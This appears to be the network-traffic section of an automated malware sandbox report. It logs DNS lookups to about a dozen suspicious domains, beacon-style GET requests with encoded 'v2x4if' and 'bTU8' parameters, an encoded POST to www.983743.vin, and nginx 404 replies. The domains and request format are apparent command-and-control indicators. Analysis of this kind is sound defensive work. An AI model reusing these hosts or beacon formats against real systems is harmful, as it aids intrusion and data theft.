            Source: global trafficHTTP traffic detected: GET /cyr7/?v2x4if=Vj4d5vaEXsFuB8fEcLmrU2eSD43jNQA/5S+cpwa+Zl1KtdnsFYOpBvNJOVDgu9PAnTJmhhfW0UddtTnseo1uNxsgVMS/H7YloLAZNbDtj8sD0y9kdjlRL77hQz9vNymozA==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.07t90q.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /1c49/?v2x4if=WckH/SqvT3kS7RHLNOlxiQ21wOxfNt38tZjSQddzpQSzD2qOP8gJzvFEgzI5dIMVlIsEuBKIXf3X3jGZEF/onz6UCD5x8CZk1xGCCmMlAa+hgJB6DGnTg2zkdlj6iSBSfg==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.stratogent.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /ms92/?v2x4if=n8dDXvAJzlUA6O6FnjGVBJIJvgZrOKbtAkr4DdUmwdjfrfZifRy06AIZkxbgl7NZdYzWyf+P5ib5INIFgNORIa1dMQY3kp3ISeG94e9yVPy6MxUyIGQp/U8X9iEsYtM0zA==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.hpb5spjmad.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /akfs/?bTU8=BDEpwP48zFO0YTL&v2x4if=tQt1VegNQ83I/PkzpW4pixplOMmFsmLQV7CNzDc4AJLZ1rC45yyod1A8fM9wkU09LD6plA5ueuCxrN9t2nRdOlhdNmqsJyRbv4nvYJOkkxov+L8TZEddOhFkQZ7NwS7+6w== HTTP/1.1Host: www.dbold.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /au3y/?v2x4if=BGHhcy5EGJH3TGsr0SdAyB/IY0TJfM6b0Iyf+x5ct/zMbQAi/VOw0CHGLkWqXJ1uj5ygw+VfiH3h5t6lg/ZXmjp4gFIYwdA6QsklqXxg8umNXWH5XR+T10UE2xCqQBbuLw==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.yesonkoicasino.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficDNS traffic detected: DNS query: www.aed.shopping
            Source: global trafficDNS traffic detected: DNS query: www.983743.vin
            Source: global trafficDNS traffic detected: DNS query: www.arcare.partners
            Source: global trafficDNS traffic detected: DNS query: www.cctv9.rest
            Source: global trafficDNS traffic detected: DNS query: www.07t90q.vip
            Source: global trafficDNS traffic detected: DNS query: www.stratogent.info
            Source: global trafficDNS traffic detected: DNS query: www.hpb5spjmad.buzz
            Source: global trafficDNS traffic detected: DNS query: www.diterra.shop
            Source: global trafficDNS traffic detected: DNS query: www.dbold.top
            Source: global trafficDNS traffic detected: DNS query: www.yesonkoicasino.net
            Source: global trafficDNS traffic detected: DNS query: www.cricketinsights.info
            Source: unknownHTTP traffic detected: POST /hi08/ HTTP/1.1Host: www.983743.vinAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateOrigin: http://www.983743.vinReferer: http://www.983743.vin/hi08/Connection: closeCache-Control: max-age=0Content-Length: 207Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4ChromeData Raw: 76 32 78 34 69 66 3d 7a 41 6d 4c 6b 72 41 35 63 6f 34 43 61 76 76 49 49 66 43 51 63 6c 57 53 68 57 6d 33 54 6d 34 49 54 44 48 61 37 31 6b 64 51 48 34 34 71 42 64 43 62 6a 6f 4f 7a 74 55 61 73 69 6e 2f 38 39 79 73 6f 5a 46 5a 6c 49 63 53 63 68 78 72 79 57 78 37 4c 37 78 4d 53 42 59 75 68 71 64 2f 61 48 4f 52 32 64 4a 68 33 65 53 47 34 64 59 51 46 2f 54 6b 61 52 4f 43 43 30 70 67 4e 78 48 44 73 4f 79 74 46 34 4d 51 4e 33 37 45 6e 78 33 73 67 74 32 62 51 68 2f 55 45 4f 6c 59 79 34 52 6e 4d 4d 77 6b 6b 7a 44 57 70 75 35 79 70 68 33 4c 39 44 64 39 51 49 45 6e 6a 52 4d 41 55 2b 53 5a 79 6a 72 32 54 6e 6d 71 54 2f 41 3d Data Ascii: v2x4if=zAmLkrA5co4CavvIIfCQclWShWm3Tm4ITDHa71kdQH44qBdCbjoOztUasin/89ysoZFZlIcSchxryWx7L7xMSBYuhqd/aHOR2dJh3eSG4dYQF/TkaROCC0pgNxHDsOytF4MQN37Enx3sgt2bQh/UEOlYy4RnMMwkkzDWpu5yph3L9Dd9QIEnjRMAU+SZyjr2TnmqT/A=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:05:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 50 3b 0a 02 31 10 ed 05 ef 30 1e 20 44 61 cb 21 8d 28 58 68 e3 09 b2 ce b8 09 64 27 4b 8c e0 de de 44 77 41 ac 2d ad 86 79 3f 1e 0f 5d ee 83 59 2e d0 b1 25 83 d9 e7 c0 a6 59 37 70 8a 19 f6 f1 2e 84 fa 0d a2 7e 49 8a b4 8d 34 d6 7b 61 c9 9c 0c ba cd b7 a3 20 a8 27 ba 66 17 d1 f4 49 e7 e5 f1 c9 e9 39 4d cf 4d 56 4a 81 85 c1 12 79 e9 20 47 20 7f b3 6d 60 38 9e 0f 3b b0 42 b0 75 29 f6 0c d7 e4 59 28 8c c0 29 c5 54 1c 1d 83 52 b5 d9 3f e2 97 5b 3c 01 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a9P;10 Da!(Xhd'KDwA-y?]Y.%Y7p.~I4{a 'fI9MMVJy G m`8;Bu)Y()TR?[<'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:05:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 50 3b 0a 02 31 10 ed 05 ef 30 1e 20 44 61 cb 21 8d 28 58 68 e3 09 b2 ce b8 09 64 27 4b 8c e0 de de 44 77 41 ac 2d ad 86 79 3f 1e 0f 5d ee 83 59 2e d0 b1 25 83 d9 e7 c0 a6 59 37 70 8a 19 f6 f1 2e 84 fa 0d a2 7e 49 8a b4 8d 34 d6 7b 61 c9 9c 0c ba cd b7 a3 20 a8 27 ba 66 17 d1 f4 49 e7 e5 f1 c9 e9 39 4d cf 4d 56 4a 81 85 c1 12 79 e9 20 47 20 7f b3 6d 60 38 9e 0f 3b b0 42 b0 75 29 f6 0c d7 e4 59 28 8c c0 29 c5 54 1c 1d 83 52 b5 d9 3f e2 97 5b 3c 01 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a9P;10 Da!(Xhd'KDwA-y?]Y.%Y7p.~I4{a 'fI9MMVJy G m`8;Bu)Y()TR?[<'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:05:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 50 3b 0a 02 31 10 ed 05 ef 30 1e 20 44 61 cb 21 8d 28 58 68 e3 09 b2 ce b8 09 64 27 4b 8c e0 de de 44 77 41 ac 2d ad 86 79 3f 1e 0f 5d ee 83 59 2e d0 b1 25 83 d9 e7 c0 a6 59 37 70 8a 19 f6 f1 2e 84 fa 0d a2 7e 49 8a b4 8d 34 d6 7b 61 c9 9c 0c ba cd b7 a3 20 a8 27 ba 66 17 d1 f4 49 e7 e5 f1 c9 e9 39 4d cf 4d 56 4a 81 85 c1 12 79 e9 20 47 20 7f b3 6d 60 38 9e 0f 3b b0 42 b0 75 29 f6 0c d7 e4 59 28 8c c0 29 c5 54 1c 1d 83 52 b5 d9 3f e2 97 5b 3c 01 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a9P;10 Da!(Xhd'KDwA-y?]Y.%Y7p.~I4{a 'fI9MMVJy G m`8;Bu)Y()TR?[<'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:05:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 07 Oct 2024 13:05:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 07 Oct 2024 13:05:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 07 Oct 2024 13:05:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 07 Oct 2024 13:06:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 07 Oct 2024 13:06:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
